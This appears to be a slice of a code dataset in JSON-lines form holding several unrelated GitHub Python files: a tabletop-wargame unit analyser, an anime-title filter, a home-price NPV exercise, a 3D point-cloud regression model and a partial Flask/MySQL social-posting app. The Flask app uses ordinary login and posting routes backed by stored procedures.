range(len(lret))])\r\n lstr=np.array([[] for i in range(len(lret))]) # list of all unit names\r\n for i in range(len(lret[0])):\r\n if type(lret[0][i])==str: # test if rounding is sensible\r\n ltemp=np.concatenate((ltemp,np.array(lret)[:,i,None]),1)\r\n lstr=np.concatenate((lstr,np.array(lret)[:,i,None]),1)\r\n else: # double array because of type conv\r\n ltemp=np.concatenate((ltemp,np.array(np.array(lret)[:,i,None],dtype='float64').round(2)),1)\r\n ltest.extend(ltemp)\r\n dist=0 # distance between unit columns\r\n for string in lstr.flatten().tolist():\r\n dist=max(dist,len(string))\r\n dist+=5\r\n string=\"{: >5} {: >5} {: >5}\"+int((len(l[0])-3)/3)*(\" {: >%d} {: >6} {: >5}\" %dist)\r\n for row in ltest:\r\n print(string.format(*row))\r\n else:\r\n return lret\r\n \r\ndef filter_mi(l,res=-1,arm=-1,test=False):\r\n lranint=[]\r\n for i in range(0,len(l),175): # 7 (different arm val) * 5 (different res val) * 5 (different sit) = 175 rows per range interval\r\n lranint.append(l[i][0])\r\n lret=[]\r\n for i in range(len(l)):\r\n if (l[i][1]==res or res==-1) and (l[i][2]==arm or arm==-1):\r\n lret.append(l[i])\r\n if test==True:\r\n ltemp=np.array([[] for i in range(len(lret))])\r\n lstr=np.array([[] for i in range(len(lret))]) # list of all unit names\r\n for i in range(len(lret[0])):\r\n if type(lret[0][i])==str: # test if rounding is sensible\r\n ltemp=np.concatenate((ltemp,np.array(lret)[:,i,None]),1)\r\n lstr=np.concatenate((lstr,np.array(lret)[:,i,None]),1)\r\n else: # double array because of type conv\r\n ltemp=np.concatenate((ltemp,np.array(np.array(lret)[:,i,None],dtype='float64').round(2)),1)\r\n # Header\r\n #ltest=[]\r\n nu=int((len(l[0])-3)/3) # number of units\r\n lenran=int(len(lret)/len(lranint)) # length of range blocks \r\n ltest=[['','']+(nu-1)*['','','']+['0','-',lranint[0]]]\r\n ltest.append(['','']+(nu-1)*['','','']+['','','Normal'])\r\n ltest.append([\"res\",\"arm\"]+nu*[\"unit\",\"dmg\",\"eff\"])\r\n for k in range(len(lranint)):\r\n #lran2=lret[k*175:(k+1)*175]\r\n for i in range(lenran):\r\n if i%(lenran/5) == 0 and (i!=0 or k!=0): # lenran/5: number of rows per situation\r\n ltest.append(['','']+nu*['','',''])\r\n if i/(lenran/5)==1:\r\n ltest.append(['','']+(nu-1)*['','','']+['Move','and','Shoot'])\r\n elif i/(lenran/5)==2:\r\n ltest.append(['','']+(nu-1)*['','','']+['Stand','and','Shoot'])\r\n elif i/(lenran/5)==3:\r\n ltest.append(['','']+(nu-1)*['','','']+['','Soft','Cover'])\r\n elif i/(lenran/5)==4:\r\n ltest.append(['','']+(nu-1)*['','','']+['','Hard','Cover'])\r\n if i==0 and k!=0: # new ranged interval\r\n ltest.append(['','']+nu*['','',''])\r\n ltest.append(['','']+(nu-1)*['','','']+[lranint[k-1],'-',lranint[k]])\r\n ltest.append(['','']+(nu-1)*['','','']+['','','Normal'])\r\n #ltest.append([\"res\",\"arm\"]+len(l1)*[\"unit\",\"dmg\",\"eff\"])\r\n ltest.append(np.array(ltemp[i+k*lenran])[1:].tolist())\r\n dist=0 # distance between unit columns\r\n for string in lstr.flatten().tolist():\r\n dist=max(dist,len(string))\r\n dist+=5\r\n string=\"{: >5} {: >5}\"+nu*(\" {: >%d} {: >5} {: >5}\" %dist)\r\n for row in ltest:\r\n print(string.format(*row))\r\n else:\r\n return lret\r\n \r\ndef filter_mi_surv(l,aim=-1,_str=-1,ap=-1,test=False):\r\n lret=[]\r\n for i in range(len(l)):\r\n if (l[i][0]==aim or aim==-1) and (l[i][1]==_str or _str==-1) and (l[i][2]==ap or ap==-1):\r\n lret.append(l[i])\r\n if test==True:\r\n ltest=[[\"aim\",\"str\",\"ap\"]]\r\n ltest[0].extend(int((len(l[0])-3)/3)*[\"unit\",\"att\",\"eff\"])\r\n ltemp=np.array([[] for i in range(len(lret))])\r\n lstr=np.array([[] for i in range(len(lret))]) # list of all unit names\r\n for i in range(len(lret[0])):\r\n if type(lret[0][i])==str: # test if rounding is sensible\r\n ltemp=np.concatenate((ltemp,np.array(lret)[:,i,None]),1)\r\n lstr=np.concatenate((lstr,np.array(lret)[:,i,None]),1)\r\n else: # double array because of type conv\r\n ltemp=np.concatenate((ltemp,np.array(np.array(lret)[:,i,None],dtype='float64').round(2)),1)\r\n ltest.extend(ltemp)\r\n dist=0 # distance between unit columns\r\n for string in lstr.flatten().tolist():\r\n dist=max(dist,len(string))\r\n dist+=5\r\n string=\"{: >5} {: >5} {: >5}\"+int((len(l[0])-3)/3)*(\" {: >%d} {: >6} {: >5}\" %dist)\r\n for row in ltest:\r\n print(string.format(*row))\r\n else:\r\n return lret\r\n\r\nwf=lambda fname,l: np.savetxt(\"./data/\"+fname+\".txt\",np.array(l))\r\nlf=lambda fname: np.loadtxt(\"./data/\"+fname+\".txt\").tolist()\r\n\r\ndef wr_he():\r\n # Characters\r\n \r\n # Mounts\r\n \r\n # Core\r\n # Citizen Spears\r\n wf(\"cs_chd\",melee(20, 4, 3, 2, 260, hmod=1))\r\n wf(\"cs\",melee(20, 4, 3, 1, 260, hmod=1))\r\n # Highborn Lancers\r\n wf(\"hl_chg\",melee([5,5], [4,3], [5,3], [2,0], 210, hmod=[1,0]))\r\n wf(\"hl\",melee([5,5], [4,3], [3,3], [0,0], 210, hmod=[1,0]))\r\n # Ellein Reavers\r\n wf(\"er_me_chg\",melee([5,5], [4,3], [4,3], [1,0], 180, hmod=[1,0]))\r\n wf(\"er_me\",melee([5,5], [4,3], [3,3], [0,0], 180, hmod=[1,0]))\r\n wf(\"er_mi\",missile(24,5,3,3,0,180))\r\n # Citizen Archers\r\n wf(\"ca_me\",melee(10, 4, 3, 0, 150, hmod=1))\r\n wf(\"ca_mi\",missile(30,10, 3, 3, 0, 150,acc=True))\r\n # Seaguard\r\n wf(\"sg_me_chd\",melee(15, 4, 3, 2, 240, hmod=1))\r\n wf(\"sg_me\",melee(15, 4, 3, 1, 240, hmod=1))\r\n wf(\"sg_mi\",missile(24,15, 3, 3, 0, 240,sta=True))\r\n \r\n # Special\r\n # Sword Masters\r\n wf(\"sm\",melee(10,6,5,2,125,hmod=1))\r\n # Lion Guard\r\n wf(\"lg_mw\",melee(10, 5, 6, 3, 220, mw=2))\r\n wf(\"lg\",melee(10, 5, 6, 3, 220))\r\n # Flame Wardens\r\n wf(\"fw\",melee(15, 5, 4, 1, 260, hmod=1))\r\n # Knights of Ryma\r\n wf(\"kor_chg\",melee([10,5], [5,3], [6,3], [3,0], 320, hmod=[1,0]))\r\n wf(\"kor\",melee([10,5], [5,3], [4,3], [1,0], 320, hmod=[1,0]))\r\n # Reaver Chariots\r\n wf(\"rc_me_chg\",melee([2,2,0], [4,3,0], [4,3,5], [1,0,2], 110, autohits=[0,0,3.5], hmod=[1,0,0]))\r\n wf(\"rc_me\",melee([2,2,0], [4,3,0], [3,3,5], [0,0,2], 110, hmod=[1,0,0]))\r\n wf(\"rc_mi\",missile(30,2, 3, 3, 0, 90))\r\n # Lion Chariot\r\n wf(\"lc_chg_mw\",melee([2,4,0], [5,5,0], [6,5,5], [3,2,2], 195, mw=[2,1,1], autohits=[0,0,4.5]))\r\n wf(\"lc_chg\",melee([2,4,0], [5,5,0], [6,5,5], [3,2,2], 195, autohits=[0,0,4.5]))\r\n wf(\"lc_mw\",melee([2,4,0], [5,5,0], [6,5,5], [3,2,2], 195, mw=[2,1,1]))\r\n wf(\"lc\",melee([2,4,0], [5,5,0], [6,5,5], [3,2,2], 195))\r\n # Giant Eagles\r\n wf(\"ge_st\",melee(2, 5, 4, 1, 100,autohits=1)) # Large => stomp(1)\r\n wf(\"ge\",melee(2, 5, 4, 1, 100))\r\n # Frost Phoenix\r\n wf(\"frp_st\",melee(4, 5+2, 5, 2, 340, autohits=3.5)) # Gigantic => stomp(d6)\r\n wf(\"frp_wb_st\",melee([4,2], [5+2,5+2], [5,4], [2,1], 380, autohits=[3.5,0], hmod=[0,1])) # Gigantic => stomp(d6)\r\n wf(\"frp\",melee(4, 5+2, 5, 2, 340))\r\n wf(\"frp_wb\",melee([4,2], [5+2,5+2], [5,4], [2,1], 380, hmod=[0,1]))\r\n #Fire Phoenix\r\n wf(\"fip_st\",melee([4,0], [5,0], [5,4], [2,1], 365, autohits=[3.5,3.5])) # Gigantic => stomp(d6)\r\n wf(\"fip_wb_st\",melee([4,0,2], [5,0,5], [5,4,4], [2,1,1], 405, autohits=[3.5,3.5,0], hmod=[0,0,1])) # Gigantic => stomp(d6)\r\n wf(\"fip\",melee([4,0], [5,0], [5,4], [2,1], 365, autohits=[0,3.5]))\r\n wf(\"fip_wb\",melee([4,0,2], [5,0,5], [5,4,4], [2,1,1], 405, autohits=[0,3.5,0], hmod=[0,0,1]))\r\n # Initiate of the Fiercy Heart\r\n wf(\"iotfh_st_br\",melee([1,4,0], [4,5,0], [3,5,4], [0,2,1], 330, autohits=[0,1,7], hmod=[1,0,0])) # Large => stomp(1)\r\n wf(\"iotfh_br\",melee([1,4,0], [4,5,0], [3,5,4], [0,2,1], 330, autohits=[0,0,7], hmod=[1,0,0]))\r\n wf(\"iotfh_st\",melee([1,4], [4,5], [3,5], [0,2], 330, autohits=[0,1], hmod=[1,0])) # Large => stomp(1)\r\n wf(\"iotfh\",melee([1,4], [4,5], [3,5], [0,2], 330, hmod=[1,0]))\r\n # Sea Guard Reaper\r\n wf(\"sgr_me\",melee(2, 4, 3, 0, 190,hmod=1))\r\n wf(\"sgr_mi_1_1\",missile(48,1, 3, 6, 10, 190,mw=2,mof=True,rel=True))\r\n wf(\"sgr_mi_1_5\",missile(48,[1,1], 3, [3,6], [10,10], 190,mw=[1,1],aa=[4,1],mof=True,rel=True)) # mw=1 is more realistic\r\n wf(\"sgr_mi_6\",missile(48,6, 3, 4, 2, 190,mof=True,rel=True))\r\n # Sky Sloop\r\n wf(\"ss_me_chg\",melee([2,2,0],[4,4,0],[4,4,5],[1,1,2],225,autohits=[0,0,3.5],hmod=[1,0,0]))\r\n wf(\"ss_me\",melee([2,2,0],[4,4,0],[3,4,5],[0,1,2],225,hmod=[1,0,0]))\r\n wf(\"ss_mi\",missile(24,4,3,5,3,225,qtf=True,rel=True))\r\n \r\n # Queen's Bows\r\n # Queen's Guard\r\n wf(\"qg_me\",melee(5, 5, 3, 0, 135,hmod=1))\r\n wf(\"qg_me_s_chd\",melee(5, 5, 3, 2, 140,hmod=1))\r\n wf(\"qg_me_s\",melee(5, 5, 3, 1, 140,hmod=1))\r\n wf(\"qg_mi\",missile(30,5, 2, 4, 1, 135))\r\n # Grey Watchers\r\n wf(\"gw_me\",melee(5, 4, 3, 0, 135))\r\n wf(\"gw_me_pw\",melee(10, 4, 3, 0, 140))\r\n wf(\"gw_mi\",missile(30,5, 2, 3, 0, 135,acc=True))\r\n \r\nif __name__ == \"__main__\":\r\n wr_he()\r\n \r\n # Core\r\n # Citizen Spears\r\n cs_chd=lf(\"cs_chd\")\r\n cs=lf(\"cs\")\r\n cs_sv_me=surv_me(20, 4, 3, 2, 260)\r\n cs_sv_mi=surv_mi(20, 3, 2, 260)\r\n # Highborn Lancers\r\n hl_chg=lf(\"hl_chg\")\r\n hl=lf(\"hl\")\r\n hl_sv_me=surv_me(5,4,3,5,210)\r\n hl_sv_mi=surv_mi(5,3,5,210)\r\n # Ellein Reavers\r\n er_me_chg=lf(\"er_me_chg\")\r\n er_me=lf(\"er_me\")\r\n er_mi=lf(\"er_mi\")\r\n er_sv_me=surv_me(5, 4, 3, 2, 180)\r\n er_sv_mi=surv_mi(5, 3, 2, 180)\r\n # Citizen Archers\r\n ca_me=lf(\"ca_me\")\r\n ca_mi=lf(\"ca_mi\")\r\n ca_sv_me=surv_me(10, 4, 3, 1, 150)\r\n ca_sv_mi=surv_mi(10, 3, 1, 150)\r\n # Seaguard\r\n sg_me_chd=lf(\"sg_me_chd\")\r\n sg_me=lf(\"sg_me\")\r\n sg_mi=lf(\"sg_mi\")\r\n sg_sv_me=surv_me(15, 5, 3, 2, 240)\r\n sg_sv_mi=surv_mi(15, 3, 2, 240)\r\n \r\n # Special\r\n # Sword Masters\r\n sm=lf(\"sm\")\r\n sm_sv_me=surv_me(5, 6, 3, 2, 125)\r\n sm_sv_mi=surv_mi(5, 3, 2, 125)\r\n # Lion Guard\r\n lg_mw=lf(\"lg_mw\")\r\n lg=lf(\"lg\")\r\n lg_sv_me=surv_me(10, 5, 3, 3, 220)\r\n lg_sv_mi=surv_mi(10, 3, 4, 220)\r\n lg_bh_sv_mi=surv_mi(10, 3, 4, 230, ht=1)\r\n # Flame Wardens\r\n fw=lf(\"fw\")\r\n fw_sv_me=surv_me(15, 5, 3, 2, 260,aeg=4)\r\n fw_sv_mi=surv_mi(15, 3, 2, 260,aeg=4)\r\n # Knights of Ryma\r\n kor_chg=lf(\"kor_chg\")\r\n kor=lf(\"kor\")\r\n kor_sv_me=surv_me(5, 5, 3, 5, 320,aeg=6)\r\n kor_f_sv_me=surv_me(5, 5, 3, 5, 320,aeg=3)\r\n kor_sv_mi=surv_mi(5, 3, 5, 320,aeg=6)\r\n kor_f_sv_mi=surv_mi(5, 3, 5, 320,aeg=3)\r\n # Reaver Chariots\r\n rc_me_chg=lf(\"rc_me_chg\")\r\n rc_me=lf(\"rc_me\")\r\n rc_mi=lf(\"rc_mi\")\r\n rc_sv_me=surv_me(3, 4, 4, 2, 110)\r\n rc_sv_mi=surv_mi(3, 4, 2, 110)\r\n # Lion Chariot\r\n lc_chg_mw=lf(\"lc_chg_mw\")\r\n lc_chg=lf(\"lc_chg\")\r\n lc_mw=lf(\"lc_mw\")\r\n lc=lf(\"lc\")\r\n lc_sv_me=surv_me(4, 5, 4, 4, 195)\r\n lc_sv_mi=surv_mi(4, 4, 4, 195)\r\n # Giant Eagles\r\n ge_st=lf(\"ge_st\")\r\n ge=lf(\"ge\")\r\n ge_sv_me=surv_me(3,5,4,0,100)\r\n ge_sv_mi=surv_mi(3,4,0,100)\r\n # Frost Phoenix\r\n frp_st=lf(\"frp_st\")\r\n frp_wb_st=lf(\"frp_wb_st\")\r\n frp=lf(\"frp\")\r\n frp_wb=lf(\"frp_wb\")\r\n frp_sv_me=surv_me(5, 7, 5, 3, 340,aeg=5)\r\n frp_wb_sv_me=surv_me(5, 7, 5, 3, 380,aeg=5)\r\n frp_sv_mi=surv_mi(5, 5, 3, 340,aeg=5)\r\n frp_wb_sv_mi=surv_mi(5, 5, 3, 380,aeg=5)\r\n #Fire Phoenix\r\n fip_st=lf(\"fip_st\")\r\n fip_wb_st=lf(\"fip_wb_st\")\r\n fip=lf(\"fip\")\r\n fip_wb=lf(\"fip_wb\")\r\n fip_sv_me=surv_me(5, 5, 5, 3, 365)\r\n fip_f_sv_me=surv_me(5, 5, 5, 3, 365,aeg=3)\r\n fip_wb_sv_me=surv_me(5, 5, 5, 3, 405)\r\n fip_wb_f_sv_me=surv_me(5, 5, 5, 3, 405,aeg=3)\r\n fip_sv_mi=surv_mi(5, 5, 3, 365)\r\n fip_f_sv_mi=surv_mi(5, 5, 3, 365,aeg=3)\r\n fip_wb_sv_mi=surv_mi(5, 5, 3, 405)\r\n fip_wb_f_sv_mi=surv_mi(5, 5, 3, 405,aeg=3)\r\n # Initiate of the Fiercy Heart\r\n iotfh_st_br=lf(\"iotfh_st_br\")\r\n iotfh_br=lf(\"iotfh_br\")\r\n iotfh_st=lf(\"iotfh_st\")\r\n iotfh=lf(\"iotfh\")\r\n iotfh_sv_me=surv_me(4, 4, 5, 4, 330)\r\n iotfh_sv_mi=surv_mi(4, 5, 4, 330)\r\n # Sea Guard Reaper\r\n sgr_me=lf(\"sgr_me\")\r\n sgr_mi_1_1=lf(\"sgr_mi_1_1\")\r\n sgr_mi_1_5=lf(\"sgr_mi_1_5\")\r\n sgr_mi_6=lf(\"sgr_mi_6\")\r\n sgr_sv_me=surv_me(4, 1, 4, 1, 190)\r\n sgr_sv_mi=surv_mi(4, 4, 1, 190)\r\n # Sky Sloop\r\n ss_me_chg=lf(\"ss_me_chg\")\r\n ss_me=lf(\"ss_me\")\r\n ss_mi=lf(\"ss_mi\")\r\n ss_sv_me=surv_me(4, 4, 4, 2, 225)\r\n ss_sv_mi=surv_mi(4, 4, 2, 225,ht=1)\r\n \r\n # Queen's Bows\r\n # Queen's Guard\r\n qg_me=lf(\"qg_me\")\r\n qg_me_s_chd=lf(\"qg_me_s_chd\")\r\n qg_me_s=lf(\"qg_me_s\")\r\n qg_mi=lf(\"qg_mi\")\r\n qg_surv_me=surv_me(5, 5, 3, 1, 135)\r\n qg_surv_mi=surv_mi(5, 3, 1, 135)\r\n # Grey Watchers\r\n gw_me=lf(\"gw_me\")\r\n gw_me_pw=lf(\"gw_me_pw\")\r\n gw_mi=lf(\"gw_mi\")\r\n gw_sv_me=surv_me(5, 4, 3, 1, 135)\r\n gw_sv_mi=surv_mi(5, 3, 1, 135,ht=1)\r\n","repo_name":"EternalNothingness/t9a_analyzer","sub_path":"t9a_analyzer.py","file_name":"t9a_analyzer.py","file_ext":"py","file_size_in_byte":39137,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"5235218223","text":"readfrom = 'animetitles.txt'\nwriteto = 'foo.txt'\n\n\nwith open(readfrom, \"rt\") as f:\n temp = f.read()\ntitles = temp.split('\\n')\n\nfiltered = filter(lambda s: '|1|' in s, titles)\ntext = \"\"\nfor line in filtered:\n\ttext += line\n\ttext += '\\n'\n\n\nwith open(writeto, \"wt\") as f:\n f.write(text)\n","repo_name":"reckert477/Term-Project","sub_path":"edit anime titles.py","file_name":"edit anime titles.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7953490300","text":"\ndef price_this_home(home_price, hurdle_rate, expected_sale_price, holding_months):\n present_value = expected_sale_price / (1 + (hurdle_rate / 12)) ** holding_months\n if present_value > home_price:\n print(\"Buy this one, junior analyst! It's worth more than it's selling for.\")\n elif present_value < home_price:\n print(\"Don't buy this, as it's offered at a price higher than what it's worth.\")\n elif present_value == home_price:\n print(\n \"Breakeven case! You can expect to earn exactly your hurdle rate on this deal.\"\n )\n\n\n net_present_value = present_value - home_price\n return net_present_value\n\n\n\n# Run the function\nnpv = price_this_home(\n home_price=100000, expected_sale_price=180000, hurdle_rate=0.10, holding_months=36\n)\n\n# Print the npv\nprint(f\"The Expected Profit is: {npv}\")\n","repo_name":"MuayThaiLegz/Class-practice","sub_path":"ToGit-HUB/Unsolved/split_second_part_2.py","file_name":"split_second_part_2.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"1862700834","text":"\"\"\"[DESAFIO] Crie um jogo onde o computador vai sortear um número entre 1 e 5 o \r\njogador vai tentar descobrir qual foi o valor sorteado.\"\"\"\r\n\r\nimport random\r\n\r\nescolhas = [1, 2, 3, 4, 5]\r\n\r\ndef input_int(mensagem):\r\n while True:\r\n entrada = int(input(mensagem))\r\n if entrada >= 1 and entrada <= 5:\r\n return entrada\r\n else:\r\n print(\"Entrada inválida. Escolha um número entre 1 e 5.\")\r\n\r\ndef resultado(escolha_usuario, escolha_ia):\r\n if escolha_usuario == escolha_ia:\r\n return \"Você adivinhou o número\"\r\n else:\r\n return \"Você errou. Tente mais uma vez!\"\r\n\r\ndef main():\r\n escolha_ia = random.randint(1, 5)\r\n\r\n print(\"\\nBem-vindo ao jogo de Adivinhação!\\n\"\r\n \"Tente adivinhar o número escolhido pela IA.\")\r\n\r\n escolha_usuario = input_int(\"\\nDigite o número entre 1 e 5 para tentar adiivinhar o número: \") \r\n\r\n resultado_jogo = resultado(escolha_usuario, escolha_ia)\r\n\r\n print(f\"\\nVocê escolheu o número: {escolha_usuario}\\n\"\r\n f\"O número escolhido pela IA foi: {escolha_ia}\\n\" \r\n f\"\\n{resultado_jogo}\\n\")\r\n\r\nmain()","repo_name":"marcospontesjunior/exerc-algoritmo-py","sub_path":"exercicios/03-condicoes-compostas/exercicio_32_desafio.py","file_name":"exercicio_32_desafio.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17819032849","text":"import logging\nimport torch\nimport torch.nn.functional as F\nfrom typing import Any\n\nfrom torch_points3d.models.base_architectures import BackboneBasedModel\n\nlog = logging.getLogger(__name__)\n\nLOSSES = {\n \"smoothl1\": F.smooth_l1_loss,\n \"l2\": F.mse_loss,\n \"l1\": F.l1_loss,\n}\n\n\nclass Regression_MP(BackboneBasedModel):\n def __init__(self, option, model_type, dataset, modules):\n \"\"\"Initialize this model class.\n Parameters:\n opt -- training/test options\n A few things can be done here.\n - (required) call the initialization function of BaseModel\n - define loss function, visualization images, model names, and optimizers\n \"\"\"\n BackboneBasedModel.__init__(\n self, option, model_type, dataset, modules\n ) # call the initialization method of UnetBasedModel\n\n nn = option.mlp_cls.nn\n self.dropout = option.mlp_cls.get(\"dropout\")\n self.lin1 = torch.nn.Linear(nn[0], nn[1])\n self.lin2 = torch.nn.Linear(nn[2], nn[3])\n self.lin3 = torch.nn.Linear(nn[4], dataset.num_classes)\n\n self.loss_fn = LOSSES[option.get(\"loss_fn\", \"smoothl1\")]\n\n self.loss_names = [\"loss_regr\"]\n\n self.visual_names = [\"data_visual\"]\n\n def set_input(self, data, device):\n \"\"\"Unpack input data from the dataloader and perform necessary pre-processing steps.\n Parameters:\n input: a dictionary that contains the data itself and its metadata information.\n \"\"\"\n data = data.to(device)\n self.input = data\n self.labels = data.y\n self.batch_idx = data.batch\n\n def forward(self, *args, **kwargs) -> Any:\n \"\"\"Run forward pass. This will be called by both functions <optimize_parameters> and <test>.\"\"\"\n data = self.down_modules[0](self.input)\n\n x = F.relu(self.lin1(data.x))\n x = F.dropout(x, p=self.dropout, training=bool(self.training))\n x = self.lin2(x)\n x = F.dropout(x, p=self.dropout, training=bool(self.training))\n x = self.lin3(x)\n self.output = x\n\n if self.labels is not None:\n self.loss_regr = F.smooth_l1_loss(self.output, self.labels) + self.get_internal_loss()\n\n self.data_visual = self.input\n self.data_visual.y = self.labels\n self.data_visual.pred = self.output\n return self.output\n\n def backward(self):\n \"\"\"Calculate losses, gradients, and update network weights; called in every training iteration\"\"\"\n # caculate the intermediate results if necessary; here self.output has been computed during function <forward>\n # calculate loss given the input and intermediate results\n self.loss_regr.backward() # calculate gradients of network G w.r.t. loss_G\n","repo_name":"j-friis/sdfi-powerlines","sub_path":"torch-3dpoints-powerline/torch_points3d/models/regression/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"27880171018","text":"from flask import Flask\nfrom flask import render_template\nfrom flask import request\nfrom flask import json\nfrom flask import session\nfrom flask import redirect\nfrom flask import url_for\nfrom flaskext.mysql import MySQL\nfrom werkzeug.security import generate_password_hash, check_password_hash\nfrom datetime import datetime, date, time, timedelta\nimport config\n\n\napp = Flask(__name__)\napp.config['DEBUG'] = True\napp.config['PROPAGATE_EXCEPTIONS'] = True\n\n\nmysql = MySQL()\n\n# MySQL configurations\napp.config['MYSQL_DATABASE_USER'] = config.DB_USER\napp.config['MYSQL_DATABASE_PASSWORD'] = config.DB_PW\napp.config['MYSQL_DATABASE_DB'] = config.DB_SCHEMA\napp.config['MYSQL_DATABASE_HOST'] = config.DB_HOST\nmysql.init_app(app)\n\napp.secret_key = 'I miss the comfort in being sad.'\n\n\n@app.route(\"/\")\ndef main():\n if session.get('user'):\n return redirect('/userHome')\n else:\n return render_template('index.html')\n\n\n@app.route('/signUp', methods=['GET'])\ndef show_sign_up():\n return render_template('sign-up.html')\n\n\n@app.route('/signUp', methods=['POST'])\ndef sign_up():\n try:\n _name = request.form['inputName']\n _email = request.form['inputEmail']\n _password = request.form['inputPassword']\n\n if _name and _email and _password:\n conn = mysql.connect()\n cursor = conn.cursor()\n _hashed_password = generate_password_hash(_password)\n cursor.callproc('sp_createUser', (_name, _email, _hashed_password))\n data = cursor.fetchall()\n\n if len(data) is 0:\n conn.commit()\n return json.dumps({'redirect': url_for('sign_in')})\n else:\n return json.dumps({'error': str(data[0][0])}), 400\n else:\n return json.dumps({'html': '<span>Enter the required fields</span>'}), 400\n\n except Exception as e:\n return json.dumps({'redirect': url_for('error')}), 500\n finally:\n cursor.close()\n conn.close()\n\n\n@app.route('/signIn', methods=['GET'])\ndef show_sign_in():\n return render_template('sign-in.html')\n\n\n@app.route('/signIn', methods=['POST'])\ndef sign_in():\n try:\n _username = request.form['inputEmail']\n _password = request.form['inputPassword']\n\n con = mysql.connect()\n cursor = con.cursor()\n cursor.callproc('sp_validateLogin', (_username,))\n data = cursor.fetchall()\n\n if len(data) > 0:\n if check_password_hash(str(data[0][3]), _password):\n session['user'] = data[0][0]\n return json.dumps({'redirect': url_for('user_home')})\n else:\n return json.dumps({'message': 'Wrong Email address or Password.'}), 401\n else:\n return json.dumps({'message': 'Wrong Email address or Password.'}), 401\n\n except Exception as e:\n return json.dumps({'redirect': url_for('error')}), 500\n finally:\n cursor.close()\n con.close()\n\n\n@app.route('/userHome')\ndef user_home():\n if session.get('user'):\n\n conn = mysql.connect()\n cursor = conn.cursor()\n\n cursor.callproc('sp_getPostsOfConnectedUsers', (session.get('user'), 50))\n posts = cursor.fetchall()\n\n post_list = []\n\n for post in posts:\n post_dict = {\n 'pid': post[0],\n 'timestamp': post[1],\n 'author': post[2],\n 'body': post[3],\n 'tags': post[4].split(',') if post[4] is not None else [],\n 'favorites': post[5]\n }\n post_list.append(post_dict)\n return render_template('user-home.html', posts=post_list)\n else:\n return render_template('sign-in.html', error='Unauthorized Access')\n\n\n@app.route('/find-friends')\ndef find_friends():\n if session.get('user'):\n conn = mysql.connect()\n cursor = conn.cursor()\n\n cursor.callproc('sp_getNonFriends', (session.get('user'),))\n people = cursor.fetchall()\n\n people_list = []\n\n for person in people:\n person_dict = {\n 'id': person[0],\n 'name': person[1],\n 'email': person[2]\n }\n people_list.append(person_dict)\n\n return render_template('friends.html', people_list=people_list)\n else:\n return render_template('sign-in.html', error='Unauthorized Access')\n\n\n@app.route('/friends/<pid>', methods=['POST'])\ndef add_friend(pid):\n if session.get('user'):\n conn = mysql.connect()\n cursor = conn.cursor()\n\n cursor.callproc('sp_connectUsers', (session.get('user'), pid))\n data = cursor.fetchall()\n\n if len(data) is 0:\n conn.commit()\n return json.dumps({'response': 'success'})\n\n else:\n return json.dumps({'response': 'error'}), 400\n\n\n@app.route('/post', methods=['POST'])\ndef post():\n if session.get('user'):\n try:\n _user = session.get('user')\n _post = request.form['post']\n _tags = request.form.getlist('tags')\n _pid = 0\n\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.callproc('sp_newPost', (_user, _post, _pid))\n data = cursor.fetchall()\n\n if len(data) is 0:\n conn.commit()\n\n cursor.close()\n\n cursor = conn.cursor()\n cursor.execute('SELECT @_sp_newPost_2')\n\n outParam = cursor.fetchall()\n cursor.close()\n\n if len(outParam) > 0:\n _id = outParam[0][0]\n cursor = conn.cursor()\n for _tag in _tags:\n cursor.callproc('sp_createPostTopic', (_id, _tag))\n data = cursor.fetchall()\n if len(data) is 0:\n conn.commit()\n return json.dumps({'response': 'success'})\n else:\n return json.dumps({'error': str(data[0])}), 400\n except Exception as e:\n return json.dumps({'redirect': url_for('error')}), 500\n finally:\n cursor.close()\n conn.close()\n\n\n@app.route('/favorite/<pid>', methods=['POST'])\ndef favorite(pid):\n if session.get('user'):\n conn = mysql.connect()\n cursor = conn.cursor()\n\n cursor.callproc('sp_createFavorite', (session.get('user'), pid))\n data = cursor.fetchall()\n\n if len(data) is 0:\n conn.commit()\n return json.dumps({'response': 'success'})\n\n else:\n return json.dumps({'response': 'error'}), 400\n\n\n@app.route('/posts/<pid>')\ndef posts(pid):\n if session.get('user'):\n\n conn = mysql.connect()\n cursor = conn.cursor()\n\n cursor.callproc('sp_getPostComments', (pid,))\n comments = cursor.fetchall()\n\n comments_list = []\n\n for comment in comments:\n comment_dict = {\n 'pid': comment[0],\n 'body': comment[1],\n 'timestamp': comment[2],\n 'author': comment[3],\n }\n comments_list.append(comment_dict)\n\n cursor.close()\n\n cursor = conn.cursor()\n cursor.callproc('sp_getPost', (pid,))\n post = cursor.fetchall()\n\n post_dict = {\n 'pid': post[0][0],\n 'timestamp': post[0][1],\n 'author': post[0][2],\n 'body': post[0][3],\n 'tags': post[0][4].split(',') if post[0][4] is not None else [],\n 'favorites': post[0][5]\n }\n \n return render_template('post.html', post=post_dict, comments=comments_list)\n else:\n return render_template('sign-in.html', error='Unauthorized Access')\n\n\n@app.route('/posts/<pid>/comments', methods=['POST'])\ndef comment(pid):\n if session.get('user'):\n _post = request.form['post']\n bod_out = ''\n stamp = datetime.now()\n author = ''\n\n conn = mysql.connect()\n cursor = conn.cursor()\n\n cursor.callproc('sp_newComment', (pid, session.get('user'), _post, bod_out, stamp, author))\n comment = cursor.fetchall()\n\n if len(comment) is 0:\n conn.commit()\n\n cursor.close()\n cursor = conn.cursor()\n cursor.execute('SELECT @_sp_newComment_3')\n body = cursor.fetchall()\n\n cursor.execute('SELECT @_sp_newComment_4')\n timestamp = cursor.fetchall()\n\n cursor.execute('SELECT @_sp_newComment_5')\n author = cursor.fetchall()\n\n cursor.close()\n\n comment = {\n 'body': body[0][0],\n 'timestamp': datetime.strptime(timestamp[0][0], \"%Y-%m-%d %H:%M:%S\"),\n 'author': author[0][0]\n }\n\n return render_template('comment.html', comment=comment)\n\n else:\n return 